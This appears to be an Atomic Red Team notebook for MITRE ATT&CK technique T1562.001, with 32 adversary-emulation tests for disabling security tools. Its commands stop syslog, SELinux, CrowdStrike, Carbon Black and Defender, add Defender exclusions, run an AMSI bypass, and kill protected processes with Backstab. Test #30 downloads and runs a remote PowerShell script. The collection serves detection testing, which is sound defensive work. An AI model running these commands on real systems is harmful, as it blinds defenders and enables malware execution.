# T1562.001 - Disable or Modify Tools
Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.(Citation: SCADAfence_ransomware)

Adversaries may also tamper with artifacts deployed and utilized by security tools. Security tools may make dynamic changes to system components in order to maintain visibility into specific events. For example, security products may load their own modules and/or modify those loaded by processes to facilitate data collection. Similar to [Indicator Blocking](https://attack.mitre.org/techniques/T1562/006), adversaries may unhook or otherwise modify these features added by tools (especially those that exist in userland or are otherwise potentially accessible to adversaries) to avoid detection.(Citation: OutFlank System Calls)(Citation: MDSec System Calls) 

Adversaries may also focus on specific applications such as Sysmon. For example, the “Start” and “Enable” values in <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-Microsoft-Windows-Sysmon-Operational</code> may be modified to tamper with and potentially disable Sysmon logging.(Citation: disable_win_evt_logging) 

On network devices, adversaries may attempt to skip digital signature verification checks by altering startup configuration files and effectively disabling firmware verification that typically occurs at boot.(Citation: Fortinet Zero-Day and Custom Malware Used by Suspected Chinese Actor in Espionage Operation)(Citation: Analysis of FG-IR-22-369)

In cloud environments, tools disabled by adversaries may include cloud monitoring agents that report back to services such as AWS CloudWatch or Google Cloud Monitor.

Furthermore, although defensive tools may have anti-tampering mechanisms, adversaries may abuse tools such as legitimate rootkit removal kits to impair and/or disable these tools.(Citation: chasing_avaddon_ransomware)(Citation: dharma_ransomware)(Citation: demystifying_ryuk)(Citation: doppelpaymer_crowdstrike) For example, adversaries have used tools such as GMER to find and shut down hidden processes and antivirus software on infected systems.(Citation: demystifying_ryuk)

Additionally, adversaries may exploit legitimate drivers from anti-virus software to gain access to kernel space (i.e. [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068)), which may lead to bypassing anti-tampering features.(Citation: avoslocker_ransomware)

## Atomic Tests

### Atomic Test #1 - Disable syslog
Disables syslog collection

**Supported Platforms:** linux

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `sh`!
##### Description: Package with rsyslog must be on system

##### Check Prereq Commands:
```sh
if (rpm -q rsyslog 2>&1 >/dev/null) || (dpkg -s rsyslog | grep -q installed) > /dev/null; then exit 0; else exit 1; fi

```
##### Get Prereq Commands:
```sh
sudo (which yum && yum -y install epel-release rsyslog)||(which apt-get && apt-get install -y rsyslog) 

```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 1 -GetPreReqs

#### Attack Commands: Run with `sh`
```sh
systemctl stop rsyslog ; systemctl disable rsyslog
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 1

#### Cleanup: 
```sh
systemctl start rsyslog ; systemctl enable rsyslog
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 1 -Cleanup

### Atomic Test #2 - Disable syslog (freebsd)Disables syslog collection
**Supported Platforms:** linux
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `sh`
```sh
service syslogd stop
sysrc syslogd_enable="NO"
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 2

#### Cleanup: 
```sh
sysrc syslogd_enable="YES"
service syslogd start
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 2 -Cleanup

### Atomic Test #3 - Disable Cb ResponseDisable the Cb Response service
**Supported Platforms:** linux#### Attack Commands: Run with `sh`
```sh
if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "6" ];
then
  service cbdaemon stop
  chkconfig off cbdaemon
else if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "7" ];
  systemctl stop cbdaemon
  systemctl disable cbdaemon
fi
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 3

### Atomic Test #4 - Disable SELinux
Disables SELinux enforcement

**Supported Platforms:** linux

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `sh`!
##### Description: SELinux must be installed

##### Check Prereq Commands:
```sh
which setenforce

```
##### Get Prereq Commands:
```sh
echo "SELinux is not installed"; exit 1

```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 4 -GetPreReqs

#### Attack Commands: Run with `sh`
```sh
setenforce 0
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 4

#### Cleanup: 
```sh
setenforce 1
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 4 -Cleanup

### Atomic Test #5 - Stop Crowdstrike Falcon on LinuxStop and disable Crowdstrike Falcon on Linux
**Supported Platforms:** linux
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `sh`
```sh
sudo systemctl stop falcon-sensor.service
sudo systemctl disable falcon-sensor.service
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 5

#### Cleanup: 
```sh
sudo systemctl enable falcon-sensor.service
sudo systemctl start falcon-sensor.service
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 5 -Cleanup

### Atomic Test #6 - Disable Carbon Black ResponseDisables Carbon Black Response
**Supported Platforms:** macos
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `sh`
```sh
sudo launchctl unload /Library/LaunchDaemons/com.carbonblack.daemon.plist
sudo launchctl unload /Library/LaunchDaemons/com.carbonblack.defense.daemon.plist
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 6

#### Cleanup: 
```sh
sudo launchctl load -w /Library/LaunchDaemons/com.carbonblack.daemon.plist
sudo launchctl load -w /Library/LaunchDaemons/com.carbonblack.defense.daemon.plist
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 6 -Cleanup

### Atomic Test #7 - Disable LittleSnitchDisables LittleSnitch
**Supported Platforms:** macos
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `sh`
```sh
sudo launchctl unload /Library/LaunchDaemons/at.obdev.littlesnitchd.plist
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 7

#### Cleanup: 
```sh
sudo launchctl load -w /Library/LaunchDaemons/at.obdev.littlesnitchd.plist
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 7 -Cleanup

### Atomic Test #8 - Disable OpenDNS UmbrellaDisables OpenDNS Umbrella
**Supported Platforms:** macos
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `sh`
```sh
sudo launchctl unload /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 8

#### Cleanup: 
```sh
sudo launchctl load -w /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 8 -Cleanup

### Atomic Test #9 - Disable macOS GatekeeperDisables macOS Gatekeeper
**Supported Platforms:** macos
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `sh`
```sh
sudo spctl --master-disable
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 9

#### Cleanup: 
```sh
sudo spctl --master-enable
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 9 -Cleanup

### Atomic Test #10 - Stop and unload Crowdstrike Falcon on macOSStop and unload Crowdstrike Falcon daemons falcond and userdaemon on macOS
**Supported Platforms:** macos
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `sh`
```sh
sudo launchctl unload /Library/LaunchDaemons/com.crowdstrike.falcond.plist
sudo launchctl unload /Library/LaunchDaemons/com.crowdstrike.userdaemon.plist
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 10

#### Cleanup: 
```sh
sudo launchctl load -w /Library/LaunchDaemons/com.crowdstrike.falcond.plist
sudo launchctl load -w /Library/LaunchDaemons/com.crowdstrike.userdaemon.plist
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 10 -Cleanup

### Atomic Test #11 - Unload Sysmon Filter Driver
Unloads the Sysinternals Sysmon filter driver without stopping the Sysmon service. To verify successful execution, o verify successful execution,
run the prereq_command's and it should fail with an error of "sysmon filter must be loaded".

**Supported Platforms:** windows

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `powershell`!
##### Description: Sysmon must be downloaded

##### Check Prereq Commands:
```cmd
if (-not (cmd.exe /c "where.exe Sysmon.exe 2> nul | findstr Sysmon 2> nul") -or (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\Sysmon\Sysmon.exe")) { exit 0 } else { exit 1 }

```
##### Get Prereq Commands:
```cmd
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://download.sysinternals.com/files/Sysmon.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\Sysmon.zip"
Expand-Archive "PathToAtomicsFolder\..\ExternalPayloads\Sysmon.zip" "PathToAtomicsFolder\..\ExternalPayloads\Sysmon" -Force

```
##### Description: sysmon must be Installed

##### Check Prereq Commands:
```cmd
if(sc.exe query sysmon | findstr sysmon) { exit 0 } else { exit 1 }

```
##### Get Prereq Commands:
```cmd
if(cmd.exe /c "where.exe Sysmon.exe 2> nul | findstr Sysmon 2> nul") { C:\Windows\Sysmon.exe -accepteula -i } else
{ & "PathToAtomicsFolder\..\ExternalPayloads\Sysmon\Sysmon.exe" -accepteula -i}

```
##### Description: sysmon filter must be loaded

##### Check Prereq Commands:
```cmd
if(fltmc.exe filters | findstr SysmonDrv) { exit 0 } else { exit 1 }

```
##### Get Prereq Commands:
```cmd
if(Test-Path "PathToAtomicsFolder\..\ExternalPayloads\Sysmon\Sysmon.exe"){
  & "PathToAtomicsFolder\..\ExternalPayloads\Sysmon\Sysmon.exe" -u
  & "PathToAtomicsFolder\..\ExternalPayloads\Sysmon\Sysmon.exe" -accepteula -i
}else{
  sysmon -u
  sysmon -accepteula -i
}

```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 11 -GetPreReqs

#### Attack Commands: Run with `command_prompt`
```command_prompt
fltmc.exe unload SysmonDrv
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 11

#### Cleanup: 
```cmd
sysmon -u -i > nul 2>&1
sysmon -i -accepteula -i > nul 2>&1
"PathToAtomicsFolder\..\ExternalPayloads\Sysmon\Sysmon.exe" -u > nul 2>&1
"PathToAtomicsFolder\..\ExternalPayloads\Sysmon\Sysmon.exe" -accepteula -i > nul 2>&1
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 11 -Cleanup

### Atomic Test #12 - Uninstall Sysmon
Uninstall Sysinternals Sysmon for Defense Evasion

**Supported Platforms:** windows

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `powershell`!
##### Description: Sysmon executable must be available

##### Check Prereq Commands:
```cmd
if(cmd /c where sysmon) {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```cmd
$parentpath = Split-Path "PathToAtomicsFolder\T1562.001\bin\sysmon.exe"; $zippath = "$parentpath\Sysmon.zip"
New-Item -ItemType Directory $parentpath -Force | Out-Null
Invoke-WebRequest "https://download.sysinternals.com/files/Sysmon.zip" -OutFile "$zippath"
Expand-Archive $zippath $parentpath -Force; Remove-Item $zippath
if(-not ($Env:Path).contains($parentpath)){$Env:Path += ";$parentpath"}

```
##### Description: Sysmon must be installed

##### Check Prereq Commands:
```cmd
if(cmd /c sc query sysmon) { exit 0} else { exit 1}

```
##### Get Prereq Commands:
```cmd
cmd /c sysmon -i -accepteula

```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 12 -GetPreReqs

#### Attack Commands: Run with `command_prompt`
```command_prompt
sysmon -u
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 12

#### Cleanup: 
```cmd
sysmon -i -accepteula >nul 2>&1
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 12 -Cleanup

### Atomic Test #13 - AMSI Bypass - AMSI InitFailedAny easy way to bypass AMSI inspection is it patch the dll in memory setting the "amsiInitFailed" function to true.
Upon execution, no output is displayed.

https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
**Supported Platforms:** windows#### Attack Commands: Run with `powershell`
```powershell
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 13

#### Cleanup: 
```powershell
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$false)
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 13 -Cleanup

### Atomic Test #14 - AMSI Bypass - Remove AMSI Provider Reg KeyWith administrative rights, an adversary can remove the AMSI Provider registry key in HKLM\Software\Microsoft\AMSI to disable AMSI inspection.
This test removes the Windows Defender provider registry key. Upon execution, no output is displayed.
Open Registry Editor and navigate to "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\" to verify that it is gone.
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `powershell`
```powershell
Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}" -Recurse
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 14

#### Cleanup: 
```powershell
New-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers" -Name "{2781761E-28E0-4109-99FE-B9D127C57AFE}" -ErrorAction Ignore | Out-Null
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 14 -Cleanup

### Atomic Test #15 - Disable Arbitrary Security Windows ServiceWith administrative rights, an adversary can disable Windows Services related to security products. This test requires McAfeeDLPAgentService to be installed.
Change the service_name input argument for your AV solution. Upon exeuction, infomration will be displayed stating the status of the service.
To verify that the service has stopped, run "sc query McAfeeDLPAgentService"
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `command_prompt`
```command_prompt
net.exe stop McAfeeDLPAgentService
sc.exe config McAfeeDLPAgentService start= disabled
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 15

#### Cleanup: 
```cmd
sc.exe config McAfeeDLPAgentService start= auto >nul 2>&1
net.exe start McAfeeDLPAgentService >nul 2>&1
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 15 -Cleanup

### Atomic Test #16 - Tamper with Windows Defender ATP PowerShellAttempting to disable scheduled scanning and other parts of windows defender atp. Upon execution Virus and Threat Protection will show as disabled
in Windows settings.
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `powershell`
```powershell
Set-MpPreference -DisableRealtimeMonitoring 1
Set-MpPreference -DisableBehaviorMonitoring 1
Set-MpPreference -DisableScriptScanning 1
Set-MpPreference -DisableBlockAtFirstSeen 1
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 16

#### Cleanup: 
```powershell
Set-MpPreference -DisableRealtimeMonitoring 0
Set-MpPreference -DisableBehaviorMonitoring 0
Set-MpPreference -DisableScriptScanning 0
Set-MpPreference -DisableBlockAtFirstSeen 0
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 16 -Cleanup

### Atomic Test #17 - Tamper with Windows Defender Command PromptAttempting to disable scheduled scanning and other parts of windows defender atp. These commands must be run as System, so they still fail as administrator.
However, adversaries do attempt to perform this action so monitoring for these command lines can help alert to other bad things going on. Upon execution, "Access Denied"
will be displayed twice and the WinDefend service status will be displayed.
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `command_prompt`
```command_prompt
sc stop WinDefend
sc config WinDefend start=disabled
sc query WinDefend
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 17

#### Cleanup: 
```cmd
sc start WinDefend >nul 2>&1
sc config WinDefend start=enabled >nul 2>&1
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 17 -Cleanup

### Atomic Test #18 - Tamper with Windows Defender RegistryDisable Windows Defender from starting after a reboot. Upen execution, if the computer is rebooted the entire Virus and Threat protection window in Settings will be
grayed out and have no info.
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `powershell`
```powershell
Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 18

#### Cleanup: 
```powershell
Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 0
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 18 -Cleanup

### Atomic Test #19 - Disable Microsoft Office Security FeaturesGorgon group may disable Office security features so that their code can run. Upon execution, an external document will not
show any warning before editing the document.


https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/
**Supported Platforms:** windows#### Attack Commands: Run with `powershell`
```powershell
New-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel"
New-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security"
New-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView"
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security" -Name "VBAWarnings" -Value "1" -PropertyType "Dword"
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView" -Name "DisableInternetFilesInPV" -Value "1" -PropertyType "Dword"
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView" -Name "DisableUnsafeLocationsInPV" -Value "1" -PropertyType "Dword"
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView" -Name "DisableAttachementsInPV" -Value "1" -PropertyType "Dword"
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 19

#### Cleanup: 
```powershell
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security" -Name "VBAWarnings" -ErrorAction Ignore | Out-Null
Remove-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView" -ErrorAction Ignore
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 19 -Cleanup

### Atomic Test #20 - Remove Windows Defender Definition FilesRemoving definition files would cause ATP to not fire for AntiMalware. Check MpCmdRun.exe man page for info on all arguments.
On later viersions of windows (1909+) this command fails even with admin due to inusfficient privelages. On older versions of windows the
command will say completed.

https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `command_prompt`
```command_prompt
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 20

### Atomic Test #21 - Stop and Remove Arbitrary Security Windows ServiceBeginning with Powershell 6.0, the Stop-Service cmdlet sends a stop message to the Windows Service Controller for each of the specified services. The Remove-Service cmdlet removes a Windows service in the registry and in the service database.
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `powershell`
```powershell
Stop-Service -Name McAfeeDLPAgentService
Remove-Service -Name McAfeeDLPAgentService
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 21

### Atomic Test #22 - Uninstall Crowdstrike Falcon on WindowsUninstall Crowdstrike Falcon. If the WindowsSensor.exe path is not provided as an argument we need to search for it. Since the executable is located in a folder named with a random guid we need to identify it before invoking the uninstaller.
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `powershell`
```powershell
if (Test-Path "C:\ProgramData\Package Cache\{7489ba93-b668-447f-8401-7e57a6fe538d}\WindowsSensor.exe") {. "C:\ProgramData\Package Cache\{7489ba93-b668-447f-8401-7e57a6fe538d}\WindowsSensor.exe" /repair /uninstall /quiet } else { Get-ChildItem -Path "C:\ProgramData\Package Cache" -Include "WindowsSensor.exe" -Recurse | % { $sig=$(Get-AuthenticodeSignature -FilePath $_.FullName); if ($sig.Status -eq "Valid" -and $sig.SignerCertificate.DnsNameList -eq "CrowdStrike, Inc.") { . "$_" /repair /uninstall /quiet; break;}}}```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 22

### Atomic Test #23 - Tamper with Windows Defender Evade Scanning -FolderMalware can exclude a specific path from being scanned and evading detection. 
Upon successul execution, the file provided should be on the list of excluded path. 
To check the exclusion list using poweshell (Get-MpPreference).ExclusionPath 
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `powershell`
```powershell
$excludedpath= "C:\Temp"
Add-MpPreference -ExclusionPath $excludedpath```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 23

#### Cleanup: 
```powershell
$excludedpath= "C:\Temp"
Remove-MpPreference -ExclusionPath $excludedpath
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 23 -Cleanup

### Atomic Test #24 - Tamper with Windows Defender Evade Scanning -ExtensionMalware can exclude specific extensions from being scanned and evading detection. 
Upon successful execution, the extension(s) should be on the list of excluded extensions.
To check the exclusion list using poweshell  (Get-MpPreference).ExclusionExtension.
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `powershell`
```powershell
$excludedExts= ".exe"
Add-MpPreference -ExclusionExtension  $excludedExts```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 24

#### Cleanup: 
```powershell
$excludedExts= ".exe"
Remove-MpPreference -ExclusionExtension  $excludedExts -ErrorAction Ignore
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 24 -Cleanup

### Atomic Test #25 - Tamper with Windows Defender Evade Scanning -ProcessMalware can exclude specific processes from being scanned and evading detection.
Upon successful execution, the process(es) should be on the list of excluded processes. 
To check the exclusion list using poweshell  (Get-MpPreference).ExclusionProcess."
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `powershell`
```powershell
$excludedProcess = "outlook.exe"
Add-MpPreference -ExclusionProcess $excludedProcess```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 25

#### Cleanup: 
```powershell
$excludedProcess = "outlook.exe"
Remove-MpPreference -ExclusionProcess  $excludedProcess
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 25 -Cleanup

### Atomic Test #26 - office-365-Disable-AntiPhishRule
Using the Disable-AntiPhishRule cmdlet to disable antiphish rules in your office-365 organization.

**Supported Platforms:** office-365

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `powershell`!
##### Description: ExchangeOnlineManagement PowerShell module must be installed

##### Check Prereq Commands:
```powershell
$RequiredModule = Get-Module -Name ExchangeOnlineManagement -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Connect-ExchangeOnline']) {exit 1} else {exit 0}

```
##### Get Prereq Commands:
```powershell
Install-Module -Name ExchangeOnlineManagement
Import-Module ExchangeOnlineManagement

```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 26 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
$secure_pwd = "None" | ConvertTo-SecureString -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential -ArgumentList "None", $secure_pwd
Connect-ExchangeOnline -Credential $creds
$test = Get-AntiPhishRule
Disable-AntiPhishRule -Identity $test.Name -Confirm:$false
Get-AntiPhishRule
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 26

#### Cleanup: 
```powershell
if("None" -ne "") {
$secure_pwd = ("None" + "") | ConvertTo-SecureString -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential -ArgumentList "None", $secure_pwd
Connect-ExchangeOnline -Credential $creds
$test = Get-AntiPhishRule
Enable-AntiPhishRule -Identity $test.Name -Confirm:$false
Get-AntiPhishRule
} 
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 26 -Cleanup

### Atomic Test #27 - Disable Windows Defender with DISMThe following Atomic will attempt to disable Windows-Defender using the built in DISM.exe, Deployment Image Servicing and Management tool. 
DISM is used to enumerate, install, uninstall, configure, and update features and packages in Windows images.
A successful execution will not standard-out any details. Remove the quiet switch if verbosity is needed.
This method will remove Defender and it's package.
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `command_prompt`
```command_prompt
Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 27

### Atomic Test #28 - Disable Defender Using NirSoft AdvancedRun
Information on NirSoft AdvancedRun and its creators found here: http://www.nirsoft.net/utils/advanced_run.html
This Atomic will run AdvancedRun.exe with similar behavior identified during the WhisperGate campaign.
See https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3
Upon successful execution, AdvancedRun.exe will attempt to run and stop Defender, and optionally attempt to delete the Defender folder on disk. 

**Supported Platforms:** windows

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `powershell`!
##### Description: Advancedrun.exe must exist at #{AdvancedRun_Location}

##### Check Prereq Commands:
```powershell
if(Test-Path -Path "PathToAtomicsFolder\..\ExternalPayloads\AdvancedRun.exe") {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "http://www.nirsoft.net/utils/advancedrun.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\advancedrun.zip"
Expand-Archive -path "PathToAtomicsFolder\..\ExternalPayloads\advancedrun.zip" -destinationpath "PathToAtomicsFolder\..\ExternalPayloads\" -Force

```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 28 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
Try {cmd /c "PathToAtomicsFolder\..\ExternalPayloads\AdvancedRun.exe" /EXEFilename "$env:systemroot\System32\sc.exe" /WindowState 0 /CommandLine "stop WinDefend" /StartDirectory "" /RunAs 8 /Run} Catch{}
if(0){
  $CommandToRun = rmdir "$env:programdata\Microsoft\Windows Defender" -Recurse
  Try {cmd /c "PathToAtomicsFolder\..\ExternalPayloads\AdvancedRun.exe" /EXEFilename "$env:systemroot\System32\WindowsPowershell\v1.0\powershell.exe" /WindowState 0 /CommandLine "$CommandToRun" /StartDirectory "" /RunAs 8 /Run} Catch{}
}
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 28

#### Cleanup: 
```powershell
Try {cmd /c "PathToAtomicsFolder\..\ExternalPayloads\AdvancedRun.exe" /EXEFilename "$env:systemroot\System32\sc.exe" /WindowState 0 /CommandLine "start WinDefend" /StartDirectory "" /RunAs 8 /Run} Catch{}
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 28 -Cleanup

### Atomic Test #29 - Kill antimalware protected processes using Backstab
Backstab loads Process Explorer driver which is signed by Microsoft and use it to terminate running processes protected by antimalware software such as MsSense.exe or MsMpEng.exe, which is otherwise not possible to kill.
https://github.com/Yaxser/Backstab
**Supported Platforms:** windows

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `powershell`!
##### Description: Backstab64.exe should exist in ExtrnalPayloads Directory
##### Check Prereq Commands:
```powershell
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\Backstab64.exe") {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://github.com/Yaxser/Backstab/releases/download/v1.0.1-beta/Backstab64.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\Backstab64.exe"

```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 29 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
& "PathToAtomicsFolder\..\ExternalPayloads\Backstab64.exe" -k -n MsMpEng.exe
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 29

### Atomic Test #30 - WinPwn - Kill the event log services for stealthKill the event log services for stealth via function of WinPwn**Supported Platforms:** windows#### Attack Commands: Run with `powershell`
```powershell
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
inv-phantom -consoleoutput -noninteractive  ```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 30

### Atomic Test #31 - Tamper with Windows Defender ATP using Aliases - PowerShellAttempting to disable scheduled scanning and other parts of Windows Defender ATP using set-MpPreference aliases. Upon execution Virus and Threat Protection will show as disabled
in Windows settings.
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `powershell`
```powershell
Set-MpPreference -drtm $True
Set-MpPreference -dbm $True
Set-MpPreference -dscrptsc $True
Set-MpPreference -dbaf $True
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 31

#### Cleanup: 
```powershell
Set-MpPreference -drtm 0
Set-MpPreference -dbm 0
Set-MpPreference -dscrptsc 0
Set-MpPreference -dbaf 0
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 31 -Cleanup

### Atomic Test #32 - LockBit Black - Disable Privacy Settings Experience Using Registry -cmdLockBit Black - Disable Privacy Settings Experience Using Registry
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `command_prompt`
```command_prompt
reg add "HKCU\Software\Policies\Microsoft\Windows\OOBE" /v DisablePrivacyExperience /t REG_DWORD /d 1 /f
```

In [ ]:
